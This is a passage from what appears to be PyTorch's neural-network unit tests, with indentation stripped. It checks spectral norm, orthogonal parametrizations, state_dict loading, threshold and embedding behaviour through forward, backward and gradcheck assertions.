v0 = m.weight_v.clone()
# TEST TRAINING BEHAVIOR
# assert that u and v are updated
input = torch.randn(2, 3, device=device)
out = wrapped_m(input)
self.assertNotEqual(u0, m.weight_u)
self.assertNotEqual(v0, m.weight_v)
# assert that backprop reaches weight_orig
# can't use gradcheck because the function changes as we
# evaluate it in training mode (each forward updates `u` and `v`)
if requires_grad:
torch.autograd.grad(out.sum(), m.weight_orig)
# test backward works with multiple forwards
# it uses training mode so we need to reset the `u` and `v` vectors
# to the same value at the beginning for the finite difference test to pass
saved_u = m.weight_u.clone()
saved_v = m.weight_v.clone()
def fn(input):
m.weight_u.data.copy_(saved_u)
m.weight_v.data.copy_(saved_v)
out0 = wrapped_m(input)
out1 = wrapped_m(input)
return out0 + out1
gradcheck(fn, (input.clone().requires_grad_(),), check_batched_grad=False)
# test removing
pre_remove_out = wrapped_m(input)
m = torch.nn.utils.remove_spectral_norm(m)
self.assertEqual(wrapped_m(input), pre_remove_out)
m = torch.nn.utils.spectral_norm(m)
for _ in range(3):
pre_remove_out = wrapped_m(input)
m = torch.nn.utils.remove_spectral_norm(m)
self.assertEqual(wrapped_m(input), pre_remove_out)
# TEST EVAL BEHAVIOR
m = torch.nn.utils.spectral_norm(m)
wrapped_m(input)
last_train_out = wrapped_m(input)
last_train_u = m.weight_u.clone()
last_train_v = m.weight_v.clone()
wrapped_m.zero_grad()
wrapped_m.eval()
eval_out0 = wrapped_m(input)
# assert eval gives same result as last training iteration
self.assertEqual(eval_out0, last_train_out)
# assert that doing more iterations in eval doesn't change things
self.assertEqual(eval_out0, wrapped_m(input))
self.assertEqual(last_train_u, m.weight_u)
self.assertEqual(last_train_v, m.weight_v)
# FIXME: the code below is flaky when executed with DataParallel
# see https://github.com/pytorch/pytorch/issues/13818
if apply_dp:
continue
# test backward works with multiple forwards in mixed training
# and eval modes
# it uses training mode so we need to reset the `u` and `v` vectors
# to the same value at the beginning for the finite difference test to pass
saved_u = m.weight_u.clone()
saved_v = m.weight_v.clone()
def fn(input):
m.weight_u.data.copy_(saved_u)
m.weight_v.data.copy_(saved_v)
wrapped_m.train()
out0 = wrapped_m(input)
wrapped_m.eval()
out1 = wrapped_m(input)
wrapped_m.train()
out2 = wrapped_m(input)
wrapped_m.eval()
out3 = wrapped_m(input)
return out0 + out1 + out2 + out3
gradcheck(fn, (input.clone().requires_grad_(),))
# assert that backprop reaches weight_orig in eval
if requires_grad:
def fn(weight):
return wrapped_m(input)
gradcheck(fn, (m.weight_orig,))
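# The parametrize-based API stores the unparametrized tensor under
# m.parametrizations.weight.original and recomputes m.weight through the
# parametrization on attribute access, instead of the weight_orig/_u/_v
# attributes used by the legacy torch.nn.utils.spectral_norm.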
def test_new_spectral_norm(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.parametrizations.spectral_norm(m)
spectral_norm_m = m.parametrizations.weight[0]
self.assertEqual(spectral_norm_m._u.size(), torch.Size([m.weight.size(0)]))
# .parametrizations.weight.original should be trainable
self.assertTrue(hasattr(m.parametrizations.weight, 'original'))
self.assertTrue('original' in m.parametrizations.weight._parameters)
# u should be just a reused buffer
self.assertTrue(hasattr(spectral_norm_m, '_u'))
self.assertTrue('_u' in spectral_norm_m._buffers)
self.assertTrue('_v' in spectral_norm_m._buffers)
# weight should be a plain attribute, not counted as a buffer or a param
self.assertIsNotNone(m.weight)
self.assertFalse('weight' in m._buffers)
self.assertFalse('weight' in m._parameters)
# it should also be sharing storage with `parametrizations.weight.original`
# self.assertEqual(m.parametrizations.weight.original.storage(), m.weight.storage())
self.assertEqual(m.parametrizations.weight.original.size(), m.weight.size())
self.assertEqual(m.parametrizations.weight.original.stride(), m.weight.stride())
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
# spectral_norm is the only parametrization
self.assertFalse(hasattr(m, 'parametrizations'))
self.assertTrue('weight' in m._parameters)
# We can register spectral_norm multiple times on the same parameter
# and on multiple parameters in the same module
m = torch.nn.utils.parametrizations.spectral_norm(m, 'weight')
m = torch.nn.utils.parametrizations.spectral_norm(m, 'weight')
m = torch.nn.utils.parametrizations.spectral_norm(m, 'bias')
# If we remove the parametrization on bias, weight is still parametrized
# Removing a parametrization runs forward in eval mode if leave_parametrized=True
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'bias')
self.assertTrue('bias' in m._parameters)
self.assertTrue(hasattr(m, 'parametrizations'))
self.assertFalse('weight' in m._parameters)
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
# Neither weight nor bias is parametrized
self.assertFalse(hasattr(m, 'parametrizations'))
self.assertTrue('weight' in m._parameters)
self.assertFalse(torch.nn.utils.parametrize.is_parametrized(m))
# test correctness in training/eval modes and cpu/multi-gpu settings
for apply_dp in (True, False):
if apply_dp:
if not TEST_MULTIGPU:
continue
device = torch.device('cuda:0')
def maybe_wrap(m):
return torch.nn.DataParallel(m, [0, 1])
else:
device = torch.device('cpu')
def maybe_wrap(m):
return m
for requires_grad in (True, False):
def get_modules():
m = nn.Linear(3, 4).to(device)
m.weight.requires_grad_(requires_grad)
m = torch.nn.utils.parametrizations.spectral_norm(m)
wrapped_m = maybe_wrap(m)
spectral_norm_m = m.parametrizations.weight[0]
return m, wrapped_m, spectral_norm_m
input = torch.randn(2, 3, device=device)
m, wrapped_m, spectral_norm_m = get_modules()
self.assertTrue(hasattr(spectral_norm_m, '_u'))
u0 = spectral_norm_m._u.clone()
v0 = spectral_norm_m._v.clone()
# TEST TRAINING BEHAVIOR
# We perform GD first to modify the initial matrix
opt = torch.optim.SGD(wrapped_m.parameters(), lr=0.1)
opt.zero_grad()
wrapped_m(input).sum().backward()
opt.step()
out = wrapped_m(input)
if requires_grad:
# run forward again and assert that u and v are updated
self.assertNotEqual(u0, spectral_norm_m._u)
self.assertNotEqual(v0, spectral_norm_m._v)
# assert that backprop reaches original weight
# can't use gradcheck because the function changes as we
# evaluate it in training mode (each forward updates `u` and `v`)
if requires_grad:
torch.autograd.grad(out.sum(), m.parametrizations.weight.original)
# test backward works with multiple forwards
# it uses training mode so we need to reset the `u` and `v` vectors
# to the same value at the beginning for the finite difference test to pass
saved_u = spectral_norm_m._u.clone()
saved_v = spectral_norm_m._v.clone()
def fn(input):
spectral_norm_m._u.data.copy_(saved_u)
spectral_norm_m._v.data.copy_(saved_v)
out0 = wrapped_m(input)
out1 = wrapped_m(input)
return out0 + out1
# Make sure we can compute gradients wrt to all the parameters in the case
# of double forward
fn(input.clone().requires_grad_()).sum().backward()
gradcheck(fn, (input.clone().requires_grad_(),), check_batched_grad=False)
# test removing
# spectral norm module needs to be in eval mode if we'd like to
# avoid doing another power iteration
m, wrapped_m, _ = get_modules()
pre_remove_out = wrapped_m(input)
m.eval()
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
self.assertEqual(wrapped_m(input), pre_remove_out)
torch.nn.utils.parametrizations.spectral_norm(m)
for _ in range(3):
pre_remove_out = wrapped_m(input)
m.eval()
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
self.assertEqual(wrapped_m(input), pre_remove_out)
# TEST EVAL BEHAVIOR
m, wrapped_m, spectral_norm_m = get_modules()
wrapped_m(input)
last_train_out = wrapped_m(input)
last_train_u = spectral_norm_m._u.clone()
last_train_v = spectral_norm_m._v.clone()
wrapped_m.zero_grad()
wrapped_m.eval()
eval_out0 = wrapped_m(input)
# assert eval gives same result as last training iteration
self.assertEqual(eval_out0, last_train_out)
# assert that doing more iterations in eval doesn't change things
self.assertEqual(eval_out0, wrapped_m(input))
self.assertEqual(last_train_u, spectral_norm_m._u)
self.assertEqual(last_train_v, spectral_norm_m._v)
# FIXME: the code below is flaky when executed with DataParallel
# see https://github.com/pytorch/pytorch/issues/13818
if apply_dp:
continue
# test backward works with multiple forwards in mixed training
# and eval modes
# it uses training mode so we need to reset the `u` and `v` vectors
# to the same value at the beginning for the finite difference test to pass
saved_u = spectral_norm_m._u.clone()
saved_v = spectral_norm_m._v.clone()
def fn(input):
spectral_norm_m._u.data.copy_(saved_u)
spectral_norm_m._v.data.copy_(saved_v)
wrapped_m.train()
out0 = wrapped_m(input)
wrapped_m.eval()
out1 = wrapped_m(input)
wrapped_m.train()
out2 = wrapped_m(input)
wrapped_m.eval()
out3 = wrapped_m(input)
return out0 + out1 + out2 + out3
gradcheck(fn, (input.clone().requires_grad_(),))
# assert that backprop reaches the original weight in eval
if requires_grad:
def fn(weight):
return wrapped_m(input)
gradcheck(fn, (m.parametrizations.weight.original,))
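# For a parametrized module, state_dict serializes the original tensor under
# 'parametrizations.<name>.original' plus each parametrization's buffers under
# its index, e.g. 'parametrizations.weight.0._u', as asserted below.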
def test_new_spectral_norm_load_state_dict(self):
for activate_times in (0, 3):
inp = torch.randn(2, 3)
m = nn.Linear(3, 5)
snm = torch.nn.utils.parametrizations.spectral_norm(m)
snm.train()
for _ in range(activate_times):
snm(inp)
state_dict = deepcopy(snm.state_dict())
self.assertEqual({
'parametrizations.weight.original',
'bias',
'parametrizations.weight.0._v',
'parametrizations.weight.0._u'
}, set(state_dict.keys()))
# test that non-strict loading works
non_strict_state_dict = deepcopy(state_dict)
non_strict_state_dict['nonsense'] = 'nonsense'
with self.assertRaisesRegex(RuntimeError, r'Unexpected key\(s\) in state_dict: "nonsense"'):
snm.load_state_dict(non_strict_state_dict, strict=True)
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['parametrizations.weight.original']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['parametrizations.weight.0._u']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['parametrizations.weight.0._v']
snm.load_state_dict(non_strict_state_dict, strict=False)
non_strict_state_dict['weight'] = snm.weight.detach().clone() # set W as a buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict._metadata['parametrizations.weight.0'] # remove metadata info
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight'] # remove W buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['bias']
snm.load_state_dict(non_strict_state_dict, strict=False)
# normal state_dict
# test that re-wrapping does not matter
m = torch.nn.utils.parametrize.remove_parametrizations(snm, 'weight')
snm = torch.nn.utils.parametrizations.spectral_norm(m)
snm.load_state_dict(state_dict)
with torch.no_grad():
snm.eval()
out0_eval = snm(inp)
snm.train()
out1_train = snm(inp)
out2_train = snm(inp)
snm.eval()
out3_eval = snm(inp)
# test that re-wrapping does not matter
m = torch.nn.utils.parametrize.remove_parametrizations(snm, 'weight')
snm = torch.nn.utils.parametrizations.spectral_norm(m)
# Test normal loading
snm.load_state_dict(state_dict)
with torch.no_grad():
snm.eval()
self.assertEqual(out0_eval, snm(inp))
snm.train()
self.assertEqual(out1_train, snm(inp))
self.assertEqual(out2_train, snm(inp))
snm.eval()
self.assertEqual(out3_eval, snm(inp))
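# The legacy spectral_norm records its serialization version in
# state_dict._metadata['']['spectral_norm']; version None state dicts (crafted
# below) keep 'weight' as a buffer and have no 'weight_v' entry.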
@skipIfNoLapack
def test_spectral_norm_load_state_dict(self):
inp = torch.randn(2, 3)
for activate_times in (0, 3):
# Test backward compatibility
# Going from version None -> 1: weight stops being a buffer and the v vector becomes a buffer
m = nn.Linear(3, 5)
snm = torch.nn.utils.spectral_norm(m)
snm.train()
for _ in range(activate_times):
snm(inp)
version_latest_ref_state_dict = deepcopy(snm.state_dict())
self.assertEqual({'weight_orig', 'bias', 'weight_u', 'weight_v'}, set(version_latest_ref_state_dict.keys()))
# test that non-strict loading works
non_strict_state_dict = deepcopy(version_latest_ref_state_dict)
non_strict_state_dict['nonsense'] = 'nonsense'
with self.assertRaisesRegex(RuntimeError, r'Unexpected key\(s\) in state_dict: "nonsense"'):
snm.load_state_dict(non_strict_state_dict, strict=True)
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight_orig']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight_u']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight_v']
snm.load_state_dict(non_strict_state_dict, strict=False)
non_strict_state_dict['weight'] = snm.weight.detach().clone() # set W as a buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict._metadata['']['spectral_norm'] # remove metadata info
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight'] # remove W buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['bias']
snm.load_state_dict(non_strict_state_dict, strict=False)
# craft a version None state_dict
version_none_state_dict = deepcopy(version_latest_ref_state_dict)
self.assertIn('spectral_norm', version_none_state_dict._metadata[''])
del version_none_state_dict._metadata['']['spectral_norm'] # remove metadata info
del version_none_state_dict['weight_v'] # remove v vector
version_none_state_dict['weight'] = snm.weight.detach().clone() # set W as a buffer
# normal state_dict
for version_latest_with_metadata in [True, False]:
version_latest_state_dict = deepcopy(version_latest_ref_state_dict)
if not version_latest_with_metadata:
# We still want to load a user-crafted state_dict, one without metadata
del version_latest_state_dict._metadata['']['spectral_norm']
# test that re-wrapping does not matter
m = torch.nn.utils.remove_spectral_norm(snm)
snm = torch.nn.utils.spectral_norm(m)
snm.load_state_dict(version_latest_ref_state_dict)
with torch.no_grad():
snm.eval()
out0_eval = snm(inp)
snm.train()
out1_train = snm(inp)
out2_train = snm(inp)
snm.eval()
out3_eval = snm(inp)
# test that re-wrapping does not matter
m = torch.nn.utils.remove_spectral_norm(snm)
snm = torch.nn.utils.spectral_norm(m)
snm.load_state_dict(version_none_state_dict)
if activate_times > 0:
# since, when loading a version None state dict, we assume that the
# values in the state dict have gone through at least one
# forward, we only test for equivalence when activate_times > 0.
with torch.no_grad():
snm.eval()
self.assertEqual(out0_eval, snm(inp))
snm.train()
self.assertEqual(out1_train, snm(inp))
self.assertEqual(out2_train, snm(inp))
snm.eval()
self.assertEqual(out3_eval, snm(inp))
# test that re-wrapping does not matter
m = torch.nn.utils.remove_spectral_norm(snm)
snm = torch.nn.utils.spectral_norm(m)
# Test normal loading
snm.load_state_dict(version_latest_state_dict)
with torch.no_grad():
snm.eval()
self.assertEqual(out0_eval, snm(inp))
snm.train()
self.assertEqual(out1_train, snm(inp))
self.assertEqual(out2_train, snm(inp))
snm.eval()
self.assertEqual(out3_eval, snm(inp))
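# spectral_norm defaults to dim=0, except for ConvTranspose*d modules where the
# output channels live in dim 1, so dim=1 is used; hence weight_u below has the
# length of weight_orig[0, :, 0, 0].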
def test_spectral_norm_dim(self):
inp = torch.randn(2, 3, 10, 12)
m = nn.ConvTranspose2d(3, 4, (5, 6))
m = torch.nn.utils.spectral_norm(m)
# this should not run into incompatible shapes
x = m(inp)
# check that u refers to the same dimension
self.assertEqual(m.weight_u.shape, m.weight_orig[0, :, 0, 0].shape)
def test_new_spectral_norm_dim(self):
inp = torch.randn(2, 3, 10, 12)
m = nn.ConvTranspose2d(3, 4, (5, 6))
m = torch.nn.utils.parametrizations.spectral_norm(m)
snm = m.parametrizations.weight[0]
# this should not run into incompatible shapes
x = m(inp)
# check that u refers to the same dimension
self.assertEqual(snm._u.shape, m.parametrizations.weight.original[0, :, 0, 0].shape)
def test_spectral_norm_forward(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.spectral_norm(m)
# naive forward
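# sigma = u^T W v (with u, v from one extra power-iteration step) approximates
# the largest singular value of W; the module's forward computes W / sigma.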
_weight, _bias, _u = m.weight_orig, m.bias, m.weight_u
_weight_mat = _weight.view(_weight.size(0), -1)
_v = torch.mv(_weight_mat.t(), _u)
_v = F.normalize(_v, dim=0, eps=1e-12)
_u = torch.mv(_weight_mat, _v)
_u = F.normalize(_u, dim=0, eps=1e-12)
_weight.data /= torch.dot(_u, torch.matmul(_weight_mat, _v))
out_hat = torch.nn.functional.linear(input, _weight, _bias)
expect_out = m(input)
self.assertEqual(expect_out, out_hat)
def test_new_spectral_norm_forward(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.parametrizations.spectral_norm(m)
snm = m.parametrizations.weight[0]
# naive forward
_weight = m.parametrizations.weight.original
_bias, _v = m.bias, snm._v
_weight_mat = _weight.view(_weight.size(0), -1)
_u = torch.mv(_weight_mat, _v)
_u = F.normalize(_u, dim=0, eps=1e-12)
_v = torch.mv(_weight_mat.t(), _u)
_v = F.normalize(_v, dim=0, eps=1e-12)
_weight.data /= torch.dot(_u, torch.matmul(_weight_mat, _v))
out_hat = torch.nn.functional.linear(input, _weight, _bias)
expect_out = m(input)
self.assertEqual(expect_out, out_hat)
def test_spectral_norm_pickle(self):
m = torch.nn.utils.spectral_norm(nn.Linear(5, 7))
m = pickle.loads(pickle.dumps(m))
self.assertIsInstance(m, nn.Linear)
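# orthogonal keeps m.weight (semi-)orthogonal: X^H X = Id for tall matrices and
# X X^H = Id for wide ones. 'matrix_exp' and 'cayley' map a skew-symmetric
# (skew-Hermitian) core onto the orthogonal group; 'householder' composes
# Householder reflectors and does not support complex tensors.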
def test_orthogonal_parametrization(self):
# Orthogonal implements 6 algorithms (3 parametrizations x 2 options for use_trivialization)
def assert_is_orthogonal(X):
n, k = X.size(-2), X.size(-1)
if n < k:
X = X.transpose(-2, -1)
n, k = k, n
Id = torch.eye(k, dtype=X.dtype, device=X.device).expand(*(X.size()[:-2]), k, k)
eps = 10 * n * torch.finfo(X.dtype).eps
torch.testing.assert_allclose(X.transpose(-2, -1).conj() @ X, Id, atol=eps, rtol=0.)
def assert_weight_allclose_Q(weight, W):
# Test that weight is equal to the Q part of the QR decomposition of W
# (or of its transpose if the matrix is wide)
wide_matrix = W.size(-2) < W.size(-1)
if wide_matrix:
W = W.transpose(-2, -1)
Q, R = torch.linalg.qr(W)
Q *= R.diagonal(dim1=-2, dim2=-1).sgn().unsqueeze(-2)
if wide_matrix:
Q = Q.transpose(-2, -1)
torch.testing.assert_allclose(Q, weight, atol=1e-5, rtol=0.)
for shape, dtype, use_linear in product(((4, 4), (5, 3), (3, 5)), # square / tall / wide
(torch.float32, torch.complex64),
(True, False)):
# Conv2d does not support complex yet
if not use_linear and dtype.is_complex:
continue
if use_linear:
input = torch.randn(3, shape[0], dtype=dtype)
else:
input = torch.randn(2, 2, shape[0] + 2, shape[1] + 1, dtype=dtype)
for parametrization, use_trivialization in product(("matrix_exp", "cayley", "householder"),
(False, True)):
# right_inverse for Cayley and matrix_exp not implemented for use_trivialization=False
# See Note [right_inverse expm cayley]
can_initialize = use_trivialization or parametrization == "householder"
# We generate them every time to always start with fresh weights
if use_linear:
m = nn.Linear(*shape, dtype=dtype)
else:
m = nn.Conv2d(2, 3, shape, dtype=dtype)
# We do not support householder for complex inputs
# See Note [Householder complex]
w_init = m.weight.clone()
if parametrization == "householder" and m.weight.is_complex():
msg = "householder parametrization does not support complex tensors"
with self.assertRaisesRegex(ValueError, msg):
torch.nn.utils.parametrizations.orthogonal(m,
"weight",
parametrization,
use_trivialization=use_trivialization)
continue
wide_matrix = w_init.size(-2) < w_init.size(-1)
torch.nn.utils.parametrizations.orthogonal(m,
"weight",
parametrization,
use_trivialization=use_trivialization)
# Forwards works as expected
self.assertEqual(w_init.shape, m.weight.shape)
assert_is_orthogonal(m.weight)
if can_initialize:
assert_weight_allclose_Q(m.weight, w_init)
# Initializing with a given orthogonal matrix works
X = torch.randn_like(m.weight)
if wide_matrix:
X = X.transpose(-2, -1)
w_new = torch.linalg.qr(X).Q
if wide_matrix:
w_new = w_new.transpose(-2, -1)
if can_initialize:
m.weight = w_new
torch.testing.assert_allclose(w_new, m.weight, atol=1e-5, rtol=0.)
else:
msg = "assign to the matrix exponential or the Cayley parametrization"
with self.assertRaisesRegex(NotImplementedError, msg):
m.weight = w_new
# Initializing with a non-orthogonal matrix makes m.weight the Q part of the given matrix
w_new = torch.randn_like(m.weight)
if can_initialize:
m.weight = w_new
assert_weight_allclose_Q(m.weight, w_new)
else:
msg = "assign to the matrix exponential or the Cayley parametrization"
with self.assertRaisesRegex(NotImplementedError, msg):
m.weight = w_new
opt = torch.optim.SGD(m.parameters(), lr=0.1)
for _ in range(2):
opt.zero_grad()
m(input).norm().backward()
grad = m.parametrizations.weight.original.grad
self.assertIsNotNone(grad)
# We do not update the upper triangular part of the matrix if tall, nor the lower triangular part if wide
if grad.size(-2) >= grad.size(-1):
zeros_grad = grad.triu(1)
else:
zeros_grad = grad.tril(-1)
self.assertEqual(zeros_grad, torch.zeros_like(zeros_grad))
# The gradient on the diagonal can only be imaginary because a skew-Hermitian
# matrix has a purely imaginary diagonal
diag_grad = grad.diagonal(dim1=-2, dim2=-1)
if grad.is_complex():
diag_grad = diag_grad.real
self.assertEqual(diag_grad, torch.zeros_like(diag_grad))
opt.step()
assert_is_orthogonal(m.weight)
def test_orthogonal_errors(self):
m = nn.Linear(3, 4)
with self.assertRaisesRegex(ValueError, "has to be one of"):
torch.nn.utils.parametrizations.orthogonal(m, "weight", "foo")
with self.assertRaisesRegex(ValueError, "Expected a matrix"):
torch.nn.utils.parametrizations.orthogonal(m, "bias")
torch.nn.utils.parametrizations.orthogonal(m, "weight")
with self.assertRaisesRegex(ValueError, "matrices of shape"):
m.weight = torch.randn(5, 5)
torch.nn.utils.parametrize.remove_parametrizations(m, "weight")
def test_threshold_int(self):
x = torch.tensor([-3, -2, -1, 0, 1, 2, 3])
expected = torch.tensor([99, 99, 99, 99, 1, 2, 3])
self.assertEqual(F.threshold(x, 0, 99), expected)
def test_threshold_bfloat16(self):
x = torch.randn(100)
for threshold in [0, -0.5, 0.5, float('inf'), float('-inf'), float('nan')]:
expected = F.threshold(x, threshold, 0).bfloat16().float()
res_bf16 = F.threshold(x.bfloat16(), threshold, 0).float()
self.assertEqual(res_bf16, expected)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_embedding_max_norm_unsorted_repeating_indices(self):
def create_embedding(device):
# Seed RNG so we get the same Embedding each time
torch.manual_seed(0)
return torch.nn.Embedding(
num_embeddings=20,
embedding_dim=64,
max_norm=1.0).to(device)
ix = torch.arange(2, device='cpu', dtype=torch.long).repeat(2000)
out_cpu = create_embedding('cpu')(ix)
ix = ix.to('cuda')
out = create_embedding('cuda')(ix)
self.assertEqual(out.cpu(), out_cpu)
def test_embedding_sparse_basic(self):
embedding = nn.Embedding(10, 20, sparse=True)
input = torch.tensor([[0, 2, 4, 5], [4, 3, 0, 9]], dtype=torch.long)
embedding(input).sum().backward()
self.assertTrue(embedding.weight.grad.is_sparse)
self.assertEqual(embedding.weight.grad.shape, embedding.weight.shape)
def test_embedding_sparse_empty_tensor(self):
embedding = nn.Embedding(0, 0, sparse=True)
input = torch.tensor([], dtype=torch.int64)
embedding(input).sum().backward()
self.assertTrue(embedding.weight.grad.is_sparse)
self.assertEqual(embedding.weight.grad.shape, embedding.weight.shape)
embedding = nn.Embedding(10, 0, sparse=True)
input = torch.LongTensor([[0, 2, 4, 5], [4, 3, 0, 9]])
embedding(input).sum().backward()
self.assertTrue(embedding.weight.grad.is_sparse)
self.assertEqual(embedding.weight.grad.shape, embedding.weight.shape)
def test_move_sparse_half_embedding(self):
embedding = nn.Embedding(10, 3, sparse=True)
self.assertEqual(embedding.weight.device.type, 'cpu')
self.assertEqual(embedding.weight.dtype, torch.float64)
embedding.to(torch.float16)
self.assertEqual(embedding.weight.dtype, torch.float16)
self.assertEqual(embedding.embedding_dim, 3)
self.assertEqual(embedding.num_embeddings, 10)
if torch.cuda.is_available():
embedding.to('cuda')
self.assertEqual(embedding.weight.device.type, 'cuda')
embedding.to('cpu')
self.assertEqual(embedding.weight.device.type, 'cpu')
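# With max_norm set, Embedding renormalizes the rows it looks up in-place
# during forward so that each returned vector has p-norm <= max_norm; repeated
# indices therefore come back as identical renormalized rows.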
def test_embedding_max_norm(self):
embedding = nn.Embedding(22, 5, max_norm=1.0)
input = torch.tensor([2, 8, 8, 6], dtype=torch.long)
output = embedding(input)
self.assertEqual(output[1], output[2])
self.assertTrue(output.data.norm(p=2, dim=1).le(1).all())
def test_embedding_from_pretrained(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
embedding = nn.Embedding.from_pretrained(a)
self.assertEqual(a, embedding.weight.data)
input = torch.LongTensor([0, 1])
output = embedding(input)
self.assertEqual(a, output)
def test_embedding_bag_from_pretrained(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
embedding = nn.EmbeddingBag.from_pretrained(a)
self.assertEqual(a, embedding.weight)
input = torch.tensor([0, 1], dtype=torch.long)
output = embedding(input, torch.arange(input.size(0)))
self.assertEqual(a, output)
def test_embedding_from_pretrained_padding_idx(self):
padding_idx = 2
padding_vec = torch.ones(3) * 7
embeddings = torch.rand(4, 3, requires_grad=True)
with torch.no_grad():
embeddings[padding_idx] = padding_vec
embedding_nn = nn.Embedding.from_pretrained(embeddings, padding_idx=padding_idx)
self.assertEqual(embedding_nn.weight[padding_idx], padding_vec)
def test_embedding_bag_from_pretrained_padding_idx(self):
padding_idx = 2
embeddings = torch.rand(4, 3, requires_grad=True)
embedding_nn = nn.EmbeddingBag.from_pretrained(embeddings, padding_idx=padding_idx)
self.assertEqual(embedding_nn.weight, embeddings)
def test_embedding_from_pretrained_options(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
opts = {
"max_norm": 2.,
"norm_type": .5,
"scale_grad_by_freq": False,
"sparse": True
}
embedding = nn.Embedding.from_pretrained(a, **opts)
input = torch.LongTensor([0, 1])
output = embedding(input)
# test output and that weight matrix was renormalized
self.assertEqual(a, output)
self.assertTrue(a.ne(torch.arange(1, 7, dtype=a.dtype).view(2, 3)).all())
self.assertTrue(output.data.norm(p=opts["norm_type"], dim=1).le(opts["max_norm"]).all())
def test_embedding_functional(self):
a = torch.tensor([
[1, 3, 2],
[0, 2, 1]
], dtype=torch.long)
embeddings = torch.rand(4, 3, requires_grad=True)
embed_old = torch.nn.Embedding(4, 3)
embed_old.weight.data = embeddings.data
res_old = embed_old(a)
res_F = F.embedding(a, embeddings)
self.assertEqual(res_old, res_F)
embed_old = torch.nn.Embedding(4, 3)
embed_old = embed_old.from_pretrained(embeddings, padding_idx=2)
res_old = embed_old(a)
res_F = F.embedding(a, embeddings, padding_idx=2)
self.assertEqual(res_old, res_F)
def test_embedding_bag_functional(self):
a = torch.tensor([
[1, 3, 2],
[0, 2, 1]
], dtype=torch.long)
embeddings = torch.rand(4, 3, requires_grad=True)
embed_old = torch.nn.EmbeddingBag(4, 3)
embed_old.weight = torch.nn.Parameter(embeddings)
res_old = embed_old(a)
res_F = F.embedding_bag(a, embeddings)
self.assertEqual(res_old, res_F)
embed_old = torch.nn.EmbeddingBag(4, 3)
embed_old = embed_old.from_pretrained(embeddings, padding_idx=2)
res_old = embed_old(a)
res_F = F.embedding_bag(a, embeddings, padding_idx=2)
self.assertEqual(res_old, res_F)
# Make sure that an error is thrown if padding_idx is out of bounds
def test_embedding_bag_padding_idx_error(self):
a = torch.tensor([
[1, 3, 2],
[0, 2, 1]
], dtype=torch.long)
num_embeddings = 4
num_features = 3
embeddings = torch.rand(num_embeddings, num_features, requires_grad=True)
functional_err_msg = r'padding_idx must be within the number of embeddings'
module_err_msg = r'padding_idx must be within num_embeddings'
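# Valid values satisfy -num_embeddings <= padding_idx < num_embeddings
# (negative values index from the end); anything outside that range must raise.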
for padding_idx in range(-(num_embeddings + 2), (num_embeddings + 2)):
if (padding_idx < -num_embeddings) or (padding_idx >= num_embeddings):
with self.assertRaisesRegex(RuntimeError, functional_err_msg):
F.embedding_bag(a, embeddings, padding_idx=padding_idx)
with self.assertRaisesRegex(AssertionError, module_err_msg):
torch.nn.EmbeddingBag(num_embeddings, num_features, padding_idx=padding_idx)
else:
F.embedding_bag(a, embeddings, padding_idx=padding_idx)
torch.nn.EmbeddingBag(num_embeddings, num_features, padding_idx=padding_idx)
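# fbgemm_pack_gemm_matrix_fp16 pre-packs the weight into fbgemm's fp16 layout
# and fbgemm_linear_fp16_weight consumes it, so the result is compared against
# an fp32 NumPy reference with loose (1e-3) tolerances to absorb half-precision
# rounding.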
@unittest.skipUnless('fbgemm' in torch.backends.quantized.supported_engines,
'Linear_FP16_weight requires FBGEMM. FBGEMM is only optimized for CPUs'
' with instruction set support avx2 or newer.')
def test_fb_fc_packed(self):
X = np.random.rand(16, 16).astype(np.float32) - 0.5
W = np.random.rand(16, 16).astype(np.float32) - 0.5
b = np.random.rand(16).astype(np.float32) - 0.5
def fc_op(X, W, b):
return np.dot(X, W.T) + b
x_tensor = torch.tensor(X)
w_tensor = torch.tensor(W)
b_tensor = torch.tensor(b)
packed_w_tensor = torch.fbgemm_pack_gemm_matrix_fp16(w_tensor)
actual_output = torch.fbgemm_linear_fp16_weight(x_tensor, packed_w_tensor, b_tensor)
expected_output = fc_op(X, W, b)
torch.testing.assert_close(torch.from_numpy(expected_output), actual_output.cpu(), atol=1e-3, rtol=1e-3)
def test_embeddingbag_from_pretrained(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
embeddingbag = nn.EmbeddingBag.from_pretrained(a)
self.assertEqual(a, embeddingbag.weight.data)
input = torch.LongTensor([[0, 1]])
output = embeddingbag(input)
self.assertEqual(a.mean(0, keepdim=True), output)
def test_embeddingbag_from_pretrained_options(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
opts = {
"max_norm": 2.,
"norm_type": .5,
"scale_grad_by_freq": False,
"mode": "max",
"sparse": False
}
embeddingbag = nn.EmbeddingBag.from_pretrained(a, **opts)
input = torch.LongTensor([[0, 1]])
output = embeddingbag(input)
self.assertEqual(a.max(0, keepdim=True)[0], output)
self.assertTrue(a.ne(torch.arange(1, 7, dtype=a.dtype).view(2, 3)).all())
